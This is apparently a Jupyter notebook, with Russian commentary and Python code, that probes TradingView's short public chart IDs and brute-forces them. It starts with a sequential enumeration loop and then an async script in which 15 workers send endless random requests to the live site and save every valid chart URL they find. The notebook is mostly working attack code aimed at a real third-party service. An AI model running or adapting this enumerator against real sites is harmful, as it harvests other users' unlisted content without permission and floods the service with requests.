## Public charts

TradingView присваивает слишком короткий UUID для публичных чартов, делая его доступным для перебора.

В `robots.txt` отсутствует директория `/chart/`, но дорка `site:tradingview.com inurl:chart/* -support -script` выдает только пользовательскую аналитику по торговым парам. 

In [1]:
import requests
from urllib.parse import urljoin, urlparse
from itertools import product
from string import ascii_letters, digits

In [2]:
CHART_URL = 'https://www.tradingview.com/chart/'
CHART_IMG = 'https://ru.tradingview.com/i/'
TEST = 'l4BkzZou'
DEBUG_ATTEMPTS = 10

status_codes = [200, 403, 404]
charset = ascii_letters + digits

In [3]:
len(TEST)

8

Запрашиваю `HTTP OPTIONS` чтобы увидеть, доступен ли метод `HEAD` для снижения нагрузки на сеть.

Метод недоступен `301`, но обнаружена [смешнявка](https://ru.tradingview.com/csp-report/)

In [5]:
r = requests.Session().options(CHART_URL)

In [6]:
print(r.text)

<!DOCTYPE html>
<html lang="en" dir="ltr"
 class="is-not-authenticated is-not-pro is-not-trial ">
<head>
	<script nonce="IZsCuuI8Ny4ecQMdG+VL+w==">
		var environment = 'battle';
		window.WS_HOST_PING_REQUIRED = true;
		window.BUILD_TIME = '2021_10_22-11_20';
		window.WEBSOCKET_HOST = 'data.tradingview.com';
		window.WEBSOCKET_PRO_HOST = 'prodata.tradingview.com';
		window.TradingView = window.TradingView || {};

	TradingView.onChartPage = true;
	</script>
	<script nonce="IZsCuuI8Ny4ecQMdG+VL+w==">
		!function(){"use strict";function t(t,e=!1){const{searchParams:s}=new URL(String(location)),n=function(t){const e=t+"=",s=document.cookie.split(";");for(let t=0;t<s.length;t++){let n=s[t];for(;" "===n.charAt(0);)n=n.substring(1,n.length);if(0===n.indexOf(e))return n.substring(e.length,n.length)}return null}("tv_app")||"";let o="true"===s.get("mobileapp_new"),i="true"===s.get("mobileapp");return e||(o||(o=["android","android_nps"].includes(n)),i||(i="ios"===n)),!("new"!==t&&"any"!==t||!o)||!

In [7]:
help(r)

Help on Response in module requests.models object:

class Response(builtins.object)
 |  The :class:`Response <Response>` object, which contains a
 |  server's response to an HTTP request.
 |  
 |  Methods defined here:
 |  
 |  __bool__(self)
 |      Returns True if :attr:`status_code` is less than 400.
 |      
 |      This attribute checks if the status code of the response is between
 |      400 and 600 to see if there was a client error or a server error. If
 |      the status code, is between 200 and 400, this will return True. This
 |      is **not** a check to see if the response code is ``200 OK``.
 |  
 |  __enter__(self)
 |  
 |  __exit__(self, *args)
 |  
 |  __getstate__(self)
 |  
 |  __init__(self)
 |      Initialize self.  See help(type(self)) for accurate signature.
 |  
 |  __iter__(self)
 |      Allows you to use a response as an iterator.
 |  
 |  __nonzero__(self)
 |      Returns True if :attr:`status_code` is less than 400.
 |      
 |      This attribute checks if

In [8]:
r.headers

{'Content-Type': 'text/html; charset=utf-8', 'Transfer-Encoding': 'chunked', 'Connection': 'keep-alive', 'Date': 'Sat, 23 Oct 2021 13:26:31 GMT', 'Vary': 'Accept-Encoding, Cookie', 'Expires': 'Sat, 23 Oct 2021 13:28:31 GMT', 'Cache-Control': 'max-age=120', 'Content-Security-Policy': "script-src 'self' 'unsafe-eval' blob: https://*.tradingview.com/ https://www.recaptcha.net/recaptcha/ https://www.gstatic.com/recaptcha/ https://maps.googleapis.com/ https://www.google-analytics.com/ https://www.googletagmanager.com/gtag/ https://*.doubleclick.net/ https://*.googleadservices.com/ https://adservice.google.com/ https://*.googlesyndication.com/ https://*.ampproject.org/ https://accounts.google.com/ https://pay.google.com/ https://*.paypal.com/ https://platform.twitter.com 'nonce-IZsCuuI8Ny4ecQMdG+VL+w=='; default-src 'self' https: data: blob: wss: 'unsafe-inline'; report-uri /csp-report/", 'X-Frame-Options': 'DENY', 'Referrer-Policy': 'origin-when-cross-origin', 'X-Content-Type-Options': 'nos

In [9]:
chart = requests.Session().get(urljoin(CHART_URL, TEST))

In [10]:
chart.status_code

200

In [11]:
chart.ok

True

Первый запуск показал, что сервер возвращает `200` на uuid любого валидного объекта, а не только чарта

In [12]:
def ajax_path(response):
    return response.text.split('data-ajax-path=')[-1].split()[0][1:-1] # [1:-1] - чтобы избавиться от кавычек в пути

In [13]:
ajax_path(requests.Session().get(urljoin(CHART_URL, 'aaaaaaah')))

'/ideas/aaaaaaah/ideas/main/'

In [14]:
def no_redirect(chart):
    redirects = ['ideas', 'script']
    path_parts = ajax_path(chart).split('/')
    return path_parts[0] in redirects

def valid(chart):
    assert chart.status_code in status_codes, f'Get unknown status code: {chart.status_code}'
    if chart.ok and no_redirect(chart):
        print(uuid)

In [15]:
import time

In [None]:
charts = {}
for i, attempt in enumerate(product(charset, repeat=len(TEST))):
    uuid = ''.join(attempt)
    #start = time.time()
    chart = requests.Session().get(urljoin(CHART_URL, uuid))
    #end = time.time()
    #print(f'{end - start}')
    if valid(chart):
        charts[uuid] = chart.status_code
    if i == DEBUG_ATTEMPTS:
        break

Приведем полученный скрипт в асинхронный вид

In [17]:
import asyncio
import aiohttp
import nest_asyncio
import random
import string
from datetime import datetime 

nest_asyncio.apply() # позволяет избежать RuntimeError в ноутбуке

In [None]:
def logger(msg, source):
    print(datetime.now(), "| msg from", source, ":", msg)  

    
def logger_worker(msg, worker_id):
    logger(msg, "worker №"+str(worker_id)) 


def save_url(url):
    f = open("URLs.txt", "a");
    f.write(str(datetime.now()) + ": "+ url + "\n")
    f.close()


def get_random_string():
    return  ''.join(random.choices(string.ascii_uppercase + string.digits + string.ascii_lowercase, k=8))


metrics = 0


async def measure_runtime():
    global metrics
    while True:
        await asyncio.sleep(10)
        logger("avrg requests per second: "+ str(metrics/10), "runtime measurer")
        metrics = 0
    
    

async def worker(id):
    logger_worker("ready", id)
    global metrics
    async with aiohttp.ClientSession() as session:

        while True:

            val = get_random_string()
            
            async with session.get('https://www.tradingview.com/chart/' + val) as resp:
                if resp.status == 200:
                    logger_worker("found valid url at /"+ val, id)
                    save_url(val)
                metrics+=1
                   
            
    logger_worker("done", id)

async def main(number_of_workers):


    tasks = []
    tasks.append(asyncio.create_task(measure_runtime()))
    
    for w in range(number_of_workers):
        tasks.append(asyncio.create_task(worker(w)))
    
        
    for t in tasks:
        await t

asyncio.run(main(15))